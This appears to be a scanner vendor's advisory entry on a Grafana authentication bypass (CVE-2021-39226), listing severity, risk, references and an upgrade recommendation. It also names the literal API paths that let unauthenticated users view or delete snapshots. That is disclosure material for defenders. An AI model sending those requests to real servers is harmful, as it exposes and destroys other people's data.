Grafana - Authentication Bypass (CVE-2021-39226)
- Severity
- CVSSv3 Score
- 7.3
- Exploitable with Sniper
- No
- Vulnerability description
Grafana server is vulnerable to CVE-2021-39226, an Authentication Bypass vulnerability in the
/api/snapshots/:keyendpoint. This allows attackers to view the snapshot with the lowest database key by accessing the literal path/api/snapshots/:key. If the snapshot "public_mode" configuration setting is set to true, unauthenticated users are able to delete the snapshot with the lowest database key by accessing the path:/api/snapshots-delete/:deleteKey.- Risk description
The risk exists that a remote unauthenticated attacker could exploit this vulnerability to read sensitive information or delete the snapshot with the lowest database key.
- Recommendation
Upgrade the Grafana server to the latest version.
- References
https://nvd.nist.gov/vuln/detail/CVE-2021-39226
https://github.com/grafana/grafana/security/advisories/GHSA-69j6-29vr-p3j9o
- Detectable with
- Network Scanner
- Vuln date
- Oct 2021
- Published at
- Updated at
- Software Type
- Monitoring solution
- Vendor
- Grafana
- Product
- Grafana Labs
- Codename
- Not available
